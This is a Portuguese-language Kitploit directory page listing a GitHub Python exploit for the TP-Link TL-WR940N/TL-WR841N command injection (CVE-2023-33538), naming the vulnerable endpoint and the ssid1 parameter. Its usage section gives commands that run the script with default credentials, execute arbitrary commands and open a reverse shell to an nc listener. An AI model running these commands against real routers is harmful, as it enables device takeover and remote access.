Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-33538 — Exploit em Python para a Vulnerabilidade de Injeção de Comandos em TP-Link TL-WR940N/TL-WR841N | Kitploit
Ferramentas/GitHubGitHub/explxx/cve-2023-33538
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Sem FioTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubexplxx/cve-2023-33538

CVE-2023-33538

Exploit em Python para a Vulnerabilidade de Injeção de Comandos em TP-Link TL-WR940N/TL-WR841N

Ver Repositório
14há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit em Python para Vulnerabilidade de Injeção de Comandos em TP-Link TL-WR940N/TL-WR841N

Instruções de Uso

  1. Verificação Básica de Vulnerabilidade:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. Executar Comando Personalizado:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
    
  3. Reverse Shell (configure o listener primeiro com nc -lvnp 4444):

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
    

Notas Importantes:

  • Estes scripts são apenas para fins educacionais e de teste
  • Sempre obtenha autorização adequada antes de testar qualquer sistema
  • O comando de reinicialização é usado como padrão porque não é destrutivo e é facilmente verificável
  • O reverse shell pode não funcionar em todas as versões de firmware, pois depende dos binários disponíveis
  • Algumas versões de firmware exigem um caminho aleatório na URL, que o script tenta detectar automaticamente

A vulnerabilidade existe devido à sanitização inadequada da entrada no parâmetro ssid1 do endpoint /userRpm/WlanNetworkRpm.htm, permitindo injeção de comandos através de requisições especialmente criadas.

Baixar ferramenta